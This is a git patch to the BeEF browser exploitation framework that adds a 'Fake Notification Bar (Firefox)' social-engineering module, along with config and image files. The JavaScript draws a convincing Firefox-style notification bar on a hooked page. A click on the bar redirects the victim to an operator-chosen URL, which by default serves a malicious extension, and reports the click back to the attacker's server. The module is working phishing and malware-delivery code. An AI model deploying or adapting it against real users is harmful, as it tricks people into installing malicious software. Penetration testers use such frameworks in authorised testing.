From b16d7e3563443678149bdaf91bca9d78c5815909 Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 4 Jul 2013 23:12:01 +0930 Subject: [PATCH] Add fake_notification_ff module Rename fake_notification module to fake_notification_ie --- .../fake_notification_ff/command.js | 36 ++++++++++++++++++ .../fake_notification_ff/config.yaml | 15 ++++++++ .../fake_notification_ff/img/install.png | Bin 0 -> 2092 bytes .../fake_notification_ff/img/jigsaw.png | Bin 0 -> 802 bytes .../fake_notification_ff/img/plugins.png | Bin 0 -> 13781 bytes .../fake_notification_ff/module.rb | 32 ++++++++++++++++ .../command.js | 0 .../config.yaml | 6 +-- .../module.rb | 4 +- 9 files changed, 88 insertions(+), 5 deletions(-) create mode 100644 modules/social_engineering/fake_notification_ff/command.js create mode 100644 modules/social_engineering/fake_notification_ff/config.yaml create mode 100644 modules/social_engineering/fake_notification_ff/img/install.png create mode 100644 modules/social_engineering/fake_notification_ff/img/jigsaw.png create mode 100644 modules/social_engineering/fake_notification_ff/img/plugins.png create mode 100644 modules/social_engineering/fake_notification_ff/module.rb rename modules/social_engineering/{fake_notification => fake_notification_ie}/command.js (100%) rename modules/social_engineering/{fake_notification => fake_notification_ie}/config.yaml (64%) rename modules/social_engineering/{fake_notification => fake_notification_ie}/module.rb (86%) diff --git a/modules/social_engineering/fake_notification_ff/command.js b/modules/social_engineering/fake_notification_ff/command.js new file mode 100644 index 000000000..5bb0b7744 --- /dev/null +++ b/modules/social_engineering/fake_notification_ff/command.js @@ -0,0 +1,36 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var id = beef.dom.generateID(); + var pid = beef.dom.generateID(); + var zztop = beef.dom.getHighestZindex()+1; + var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'}); + var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABcAAAAWCAIAAACkFJBSAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAK3SURBVDhPpZD7T1JhHMbPn1NbrdvKmpmtieJdyBuCXA/e8IJRDtOJiEpkNUzEG6QCivWDrlroxDnNbtqWzqwxMZU0jyDayi6uA1vfRF/PUn9i++zsOS/P8+EFzL/xKHgw/8bDw/CtH/rRfxPMD9UD6CEcrY+t8vEh9eay+ZDO3hAs1v38Isy6O1nnQ47Hx4RODGsO7FAPwdK9ny13d0dLKSOJXiDhLs6YDuxQDzG/twsx+Vxj7ysfsylf9Kssxoq8HN6t6uLJsXtvh2vh8PWg6pvLSO2jjPm8lh3WLMqbvNMnjwJnzxyjR4ZzOSlXGdF02oVLoSdPnTjCSLjsfHd/r4+GXgtYzAHINXNVRV58bAQjkZ7MjGWzmLiQnclOhteEOBogyWG73jejPjVgvjVTANLTqVZJYZmbzReLODlZPAjwDCASZMik+OK0fmFK65ltgjIaQgBLB+JZn66nq2looOf6tVwkAlfAy2Uz61RCLuuKQp5KOHTUIVjaET+I3p/uJ+R6r9WshUsFrhMgW8xlpSVFR4WHh52LooXOvNJQh5jP04542a94M6hcnqmvqykQ8NLh+7PwTNiDBQJc0G7r1KjLGuur3E4DdQgWYwDSbczFk+LoIRI8hpkYKeSny0sKbsgkYhEbFPCsKCv84jBtrg5uErZ/f8ruEAJGegw7uA0qRX4ULSwy4mJaSry+oXbBYf84ZVNXl+LCDLAU5fPnp7Sk58E2u6vtgJHuNoTJUMnlJAt4abDp7a78vdK26tDfrpGKBCwQCfmpjok6ah9lsLQiRge0JbI8+P3FRWLdXal3TjduV/I4DGkhriiXqavlrukGah9ljFxtQXxfti7NDS/NjXx2jhCfnm6tGL+6umY/jLico8T8kGexf4top/ZRBktz8IBFHzwYSTQGD/aHaAwesDQEz1/qC1RvBXP1zgAAAABJRU5ErkJggg==);'}); + var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'}) + var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'}); + $j('body').append(el); + var hid = '#'+id; + var hpid = '#'+pid; + $j(hid).append(elp); + $j(hpid).html("<%= @notification_text %> "); + $j(hid).append(ell); + //$j(hid).append("Problems installing? "); + $j(hid).append(elr); + $j(hid).click(function() { + $j(this).slideUp(300,function() { + $j(this).remove(); + }); + window.location = '<%= @url %>'; + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification'); + }); + $j(hid).css('cursor','pointer'); + $j(hid).slideDown(300,function() { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed'); + }); + +}); diff --git a/modules/social_engineering/fake_notification_ff/config.yaml b/modules/social_engineering/fake_notification_ff/config.yaml new file mode 100644 index 000000000..a501a37aa --- /dev/null +++ b/modules/social_engineering/fake_notification_ff/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + fake_notification_ff: + enable: true + category: "Social Engineering" + name: "Fake Notification Bar (Firefox)" + description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)." + authors: ["xntrik", "bcoles"] + target: + user_notify: ['ALL'] diff --git a/modules/social_engineering/fake_notification_ff/img/install.png b/modules/social_engineering/fake_notification_ff/img/install.png new file mode 100644 index 0000000000000000000000000000000000000000..fb44d07a6da326a5269428b69ac72899ad577768 GIT binary patch literal 2092 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 literal 0 HcmV?d00001 diff --git a/modules/social_engineering/fake_notification_ff/img/plugins.png b/modules/social_engineering/fake_notification_ff/img/plugins.png new file mode 100644 index 0000000000000000000000000000000000000000..73104156c742966853058a9c47108f31cfa10d59 GIT binary patch literal 13781 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 z zZ=5n8{V&*ix!e|k01X^i+;N~=5{+61H-U4a%^RI9ODg99fHg>M`$dTd{ z4EiJ?bT`|gWmMQ2)9qsg8NGaZ^dVJDftoQCSGC?Uy&P~wNS4i8Wh@%|eCeUz@d*$2 zi3`ADiEB#jaYr!t%^q}Xhz@z>o+oXyEtsL1^9JsMD0P1lq%RNlXs%Ufb_*0ux-Y#A zAX$DTUlr(tUKf{0E^On{(RjT`Z)n~v z?4!%g1lS%peh_)OYTRHQtU_c|4!n0=ZOzs{LlC;aWkLtmdP6@$F79>t`a~)^2fowa z(^ofq{oK}0k33JM9k`;oHXLL55phBh-uFsggsU{v#jVcf%v?)q{OW^rf9eqPl~361uQj|MHUE zar@YVIg2xPMNNY^k`-XD>4^9P+$k;xQ(<;;vp=g37P4JD)W%;Q<%s|e%=ofNp@D^9 z77XyjsK|vI6^$F}OJm9d#Nn-_F36nnJD+T8da%=&#_mfrygA~-B2rKfv1K)y^A@g~ z1n>f9N(81k-z9)s@B7wn`tf89KEHcYy!I{#M428W>kcaw<79Kf=~i2ifk@D?5B{7X zxf6jq*)rD%rIparX7g@mK8Jv}IsQ^44ZBl43(G)?M6lhVG=x;9+6)cOII*EX_+KIU z0yZ#23l^r90_$-;YY27@-Ha6Q-8Zoy5r2@qb()UID^r+~iXmB44Q~f?ZH7pYX@%|L zdUC?ibAC$(zIzlq(N~2QOEAr-6S*7&`z|5|i>JQsNo2To-CfAM&G6}@h1QXx6}b!L 